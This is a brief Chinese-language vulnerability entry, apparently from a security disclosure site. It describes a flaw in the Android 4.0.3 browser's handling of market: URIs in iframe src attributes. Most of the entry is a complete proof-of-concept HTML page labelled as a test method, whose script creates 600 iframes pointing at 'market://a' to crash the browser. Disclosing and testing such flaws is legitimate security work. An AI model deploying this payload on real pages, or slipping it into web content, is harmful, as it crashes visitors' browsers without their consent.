Android 4.0.3浏览器应用不正确处理特殊的URI,允许攻击者在IFRAME元素SRC属性中使用特制的market: URI并诱使应用程序解析,可使应用程序崩溃。
测试方法
```
<html>
<body>
<script type="text/javascript">
var m_frame = "";
for(var i = 0; i < 600; i++)
{
m_frame = document.createElement("iframe");
m_frame.setAttribute("src", "market://a");
document.body.appendChild(m_frame);
}
</script>
</body>
</html>
```
暂无评论